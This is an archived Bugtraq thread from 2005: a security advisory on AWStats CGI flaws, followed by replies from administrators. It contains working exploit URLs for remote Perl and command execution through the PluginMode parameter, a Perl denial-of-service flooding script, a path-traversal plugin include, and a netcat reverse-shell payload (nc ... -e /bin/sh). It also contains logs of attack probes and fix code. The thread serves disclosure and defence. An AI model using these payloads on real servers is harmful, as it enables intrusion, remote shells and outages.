X-VirusChecked: Checked
X-Env-Sender: [EMAIL PROTECTED]
com
X-StarScan-Version: 5.4.11; banners=-,-,-
X-Originating-IP: [205.206.231.27]
X-SpamWhitelisted: domain whitelist
Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:[EMAIL PROTECTED]>
List-Unsubscribe: <mailto:[EMAIL PROTECTED]>
List-Subscribe: <mailto:[EMAIL PROTECTED]>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Date: 14 Feb 2005 08:10:40 -0000
From: [EMAIL PROTECTED],
[EMAIL PROTECTED]@www.securityfocus.com <[EMAIL PROTECTED]>
To: bugtraq@securityfocus.com
Subject: AWStats <= 6.4 Multiple vulnerabilities
/*==========================================*/
// GHC -> AWStats <- ADVISORY
\\ PRODUCT: AWStats
// VERSION: <= 6.3
\\ URL: http://awstats.sourceforge.net/
// VULNERABILITY CLASS: Multiple vulnerabilities
\\ RISK: high
/*==========================================*/
[Product Description]
"AWStats is a free powerful tool that generates advanced web, ftp or
mail server statistics, graphically.
This log analyzer works as a CGI or from command line and shows you
all possible information your log contains,
in few graphical web pages".
Current stable version: AWStats 6.3 final
Development version is 6.4 - 2005-02-06 14:31
[Summary]
Successful exploitation of an input validation vulnerability in
AWStats scripts
allows attackers to execute limited perl directives under the privileges of
the web server, get sensetive information.
Some actions of the attacker can lead to denial of service.
[Details]
Some AWStats's functions can be extended with plugins.
Two variables (loadplugin & pluginmode) are dealing with it.
The first one (loadplugin) is responsible for plugins list (plugin1,
plugin2); the second one
runs plugin's functions.
Exploitable example (raw log plugin):
http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadpl
ugin=rawlog
Server answer:
192.*.*.* - - [26/Jan/2005:11:01:41 +0300] "GET /cgi-bin/index.cgi
HTTP/1.1" 500 606
192.*.*.* - - [26/Jan/2005:11:03:54 +0300] "GET /cgi-bin/index.cgi
HTTP/1.1" 500 606
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET
/themes/standard/style.css HTTP/1.1" 200 2986
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /cgi-bin/index.cgi
HTTP/1.1" 200 7710
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET
/themes/standard/images/logo.gif HTTP/1.1" 200 14443
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/xml.gif
HTTP/1.1" 200 429
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/pb_yawps.gif
HTTP/1.1" 200 2532
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET
/themes/standard/images/valid-html401.gif HTTP/1.1" 200 2250
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET
/themes/standard/images/vcss.gif HTTP/1.1" 200 1547
192.*.*.* - - [26/Jan/2005:11:08:06 +0300] "GET /cgi-bin/forum.cgi
HTTP/1.1" 200 7333
192.*.*.* - - [26/Jan/2005:11:08:11 +0300] "GET /cgi-bin/links.cgi
HTTP/1.1" 200 7588
192.*.*.* - - [26/Jan/2005:11:08:12 +0300] "GET /cgi-bin/top10.cgi
HTTP/1.1" 200 7910
192.*.*.* - - [26/Jan/2005:11:08:17 +0300] "GET /cgi-bin/admin.cgi
HTTP/1.1" 200 7340
192.*.*.* - - [26/Jan/2005:11:08:33 +0300] "GET /yawpsnews.xml
HTTP/1.1" 200 153
The dangerous fact is that attacker can read sensitive information such as
IP address, admin scripts names, non encoded GET queries, etc.
Our variables pass some verification (as others), but it is not
enough for security:
sub Sanitize {
my $stringtoclean=shift;
$stringtoclean =~ s/[^\w_\-\\\/\.:\s]//g;
return $stringtoclean;
}
Deletes everything but '_', '-', '\', '/', '.', ':' and any blank symbol.
It's enough for variables with path to configuration files, but not
for plugin tasks.
In case of "loadplugin" & "pluginmode" developers obviously have a
lot of trust to the user.
So, let's see what can be done, in fact.
[1] Perl code execution.
http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
we'll get the action in next piece of code:
# AWStats output is replaced by a plugin output
if ($PluginMode) {
my $function="BuildFullHTMLOutput_$PluginMode()";
eval("$function");
if ($? || $@) { error("$@"); }
&html_end(0);
exit 0;
}
If variable exists, we'll get code execution. This happens after
sanitizing (see privious).
Here we have intresting part in:
my $function="BuildFullHTMLOutput_$PluginMode()";
eval("$function");
This is subroutine call (As example sub BuildFullHTMLOutput_rawlog() from
rawlog.pm plugin).
Ideal case: "module name"::BuildFullHTMLOutput_"function name"().
But if we won't specify the name of module (with "loadplugin"
parameter) we'll get the next:
main::BuildFullHTMLOutput_"function name"().
By the way, there is permited symbol ':' in user input parameters.
So, we can send:
PluginMode=:print+getpwent
And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
This will satisfy eval() requirements., and :print getpwent() is executed.
http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:pri
nt+getpwent
Sanitazing limits user's input, but there is no filtration for call
sympols '()'.
Here we can see that somebody can perform DoS attack.
This is example of simple code for successful DoS exploitation:
#!/usr/bin/perl
use IO::Socket;
$server = 'www.example.com';
sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$server", PeerPort => "80")
|| die "Error\n";
print $socket "GET
/cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep
HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "\n\n";
}
while () {
$rp = rand;
&ConnectServer;
}
[BUGFIX]
Change vulnerable code for:
sub PluginSanitize {
my $stringtoclean=shift;
$stringtoclean =~ s/[^\w]//g;
return $stringtoclean;
}
[2] Arbitrary plugin including.
http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../
usr/libdata/perl/5.00503/blib
Arbitrary module from user's input through "loadplugin" parameter
can be included with "require" function..
Bugfix - as above or something like this:
opendir (PDIR, './plugins');
@FilesPDIR = readdir(PDIR);
closedir (PDIR);
foreach $FilesPName (@FilesPDIR) {
if ($FilesPName =~ m/$loadplugin/) {
}
}
The good thing is the poison null-byte (%00) has no place (transferes to 00).
[3] Sensetive information leak in AWStats version 6.3(Stable) -
6.4(Development).
Every user can access debug function:
http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1
http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2
[DISCLOSURE TIMELINE]
10-02-2005 Initial vendor notification.
14-02-2005 No response.
14-02-2005 Bug-traq post.
/* ================================================== */
/* www.ghc.ru -- security games & challenges */
/* ================================================== */
/* greets to: RST.void.ru, cr0n & all quest hunters %)*/
/* Special respect to e-defense. */
/* ================================================== */
At 16:24 +0100 15/2/2005, Ondra Holecek wrote:
|
| PluginMode=:print+getpwent
|
| And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
| This will satisfy eval() requirements., and :print getpwent() is executed.
|
|
http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:prin
t+getpwent
|
| Sanitazing limits user's input, but there is no filtration for
call sympols '()'.
no, user is not limited, he can execute ANY command if he add ; at the
end of the command, try this
awstats.pl?&PluginMode=:print+system('id')+;
or even this
awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
At 14:25 -0500 15/2/2005, Jamie Pratt wrote:
So what are the conditions of this bug/vuln? I can't reproduce
this on several 6.3 installs..:
awstats 6.3 from source:
request:
http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+sy
stem('id')+;
output:
****************
Error: Can't locate object method "BuildFullHTMLOutput_print" via
package "systemid" (perhaps you forgot to load "systemid"?) at
(eval 1) line 1.
Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or
permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs'
directory).
***************
At 20:52 +0100 15/2/2005, Ondra Holecek wrote:
It seems this bug works only on my server, i dont know why
/awstats.pl?&PluginMode=:print+system('id')+;
reply:
uid=99(nobody) gid=4294967295 groups=4294967295,98(nobody) 256
Error:
Setup ('/usr/local/etc/awstats/awstats.conf' file, web server or
permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs'
directory).
awstats: Advanced Web Statistics 6.1 (build 1.751) (original)
perl: This is perl, v5.8.5 built for i586-linux
os: Linux xxx.tld 2.4.22 #4 Wed Jul 7 21:07:03 CEST 2004 i586 unknown
unknown GNU/Linux
At 16:38 -0500 15/2/2005, Herman Sheremetyev wrote:
It works on mine too, though I still have 6.1. I think you may
need to add the config=www.example.com into the url between the '?'
and the '&' for it to work properly though. On my linux boxes with
apache 2.0 it displays the command output in the page but on
openbsd with apache 1.3 it gives a 500 Server Error because the
output ends up in the headers somehow. Either way it works though.
At 22:23 +0100 15/2/2005, Ondra Holecek wrote:
im sorry i didnt write it, only awstat 6.1 and 6.2 is vulnerable to this
bug (system('id'), etc.)
At 12:53 -0800 15/2/2005, William Pratt wrote:
Same thing here on both 6.3 and 6.4. I am unable to reproduce this.
Error: Can't locate object method "BuildFullHTMLOutput_print" via
package "systemid" (perhaps you forgot to load "systemid"?) at
(eval 1) line 1.
Setup
('/usr/local/apache/root/billpratt_net/cgi-bin/awstats/awstats.conf' f
ile, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs'
directory).
William Pratt
Sr. Engineering Application Developer
Megapath Networks, Inc.
Http://www.MegaPath.net
I wish there was a knob on the TV to turn up the intelligence.
There's a knob called "brightness", but it doesn't seem to work.
At 17:19 -0500 15/2/2005, Jeffrey Wilkinson wrote:
Nonetheless, each of these causes AWstats to disclose the full path to the
AWstats installation, regardless if *nix or Windows. That alone is enough
for concern.
At 14:00 -0700 15/2/2005, [EMAIL PROTECTED] wrote:
You may need to specify an awstats config to view
example:
http://www.site.org/awstats/cgi-bin/awstats.pl?config=websitename&Pl
uginMode=:print+system('id')+
;
At 16:46 -0500 15/2/2005, Jamie Pratt wrote:
Still no dice on 6.3, even with the "config=www.site.org" etc,etc..
same error. So.. Can we all agree that 6.3 is not vulnerable,
because I'd rather not upgrade to a dev/unstable release for no
reason...
At 9:47 -0500 16/2/2005, Thom Craver wrote:
I can confirm the bug on 6.3 running Apache 2.0.52.
Furthermore, ANY system command inserted in the system() call can
be executed. This is a very serious bug. Unpriviledged user or
not, with an .rhosts file on a potential attacker's end, scp would
work just nicely, then a chmod, then execution of any script they
wanted to upload.
This issue is not to be taken lightly.
Until this issue is resolved, we have commented out the Plugin lines:
# AWStats output is replaced by a plugin output
if ($PluginMode) {
my $function="BuildFullHTMLOutput_$PluginMode()";
eval("$function");
if ($? || $@) { error("$@"); }
&html_end(0);
exit 0;
}
If a plugin is called, it is apparently ignored and the stats are displayed.
--
Thom Craver
Corporate Communications, Inc.
www.corp-com.com
At 7:45 +0000 16/2/2005, K-OTiK Security wrote:
6.4 was released on 2005-02-14 13:13
Fixes:
- Fix security hole that allowed a user to read log file content even
when plugin rawlog was not enabled.
- Fix a possible use of AWStats for a DoS attack.
- configdir option was broken on windows servers.
- Minor fixes
Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com/english
At 15:52 -0500 16/2/2005, Micah Brandon wrote:
I'm going to have to disagree. Execution of Perl functions
is still possible in 6.3. You just have to jimmy it a little and
try/guess different plugins that may be installed. I got a hit
with 'hostinfo'. Try this on your server:
http://server/cgi-bin/awstats.pl?config=someconfig&PluginMode=hostinfo+time
Unix time shows up just below 'Whois command failed' error message.
That's game over in my book.
At 20:34 -0500 16/2/2005, Michael Scheidell wrote:
And the skiddies who tried to exploit something that didn't exist on our
site:
(this goes on for some time, here is just a snipp)
So, anyone out there who decided to do a 'wait and see', don't.
Disable awstats, use access rules, upgrade it or all three.
217.172.168.109 - - [03/Feb/2005:12:28:28 -0500] "GET
//cgi-bin/awstats/awstats.
pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible;
MSIE 6.
0; Windows 98)"
217.172.168.109 - - [03/Feb/2005:12:28:29 -0500] "GET
//cgi-bin/awstats.pl?confi
gdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windo
ws 98)"
64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET
//cgi-bin/awstats/awstats.pl?
configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible;
MSIE 6.0;
Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET
//cgi-bin/awstats.pl?configdi
r=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows
98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET
//cgi/awstats.pl?configdir=|%
20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET
//awstatswwwroot/cgi-bin/awst
ats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0
(compatible; MSI
E 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET
//cgi/awstats.pl?configdir=|%
20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET
//cgi-bin/cgi-bin/awstats.pl?
configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible;
MSIE 6.0;
Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/
cgi-bin/awstats.pl
At 14:01 -0500 17/2/2005, Matt Wilder wrote:
Awstats version 5.6 is not succeptable to this as it does not have the
same plugin architecture. Could this be a >= 6.0 bug?
At 14:46 +0000 18/2/2005, newbug Tseng wrote:
Hi.
Please check
http://packetstormsecurity.org/0501-exploits/AWStatsVulnAnalysis.pdf
there're some code analysis for awstats.
At 22:26 +0000 3/5/2005, Laurent Destailleur wrote:
>Subject: AWStats <= 6.4 Multiple vulnerabilities
Must read AWStats <= 6.3. Version 6.4 is not affected.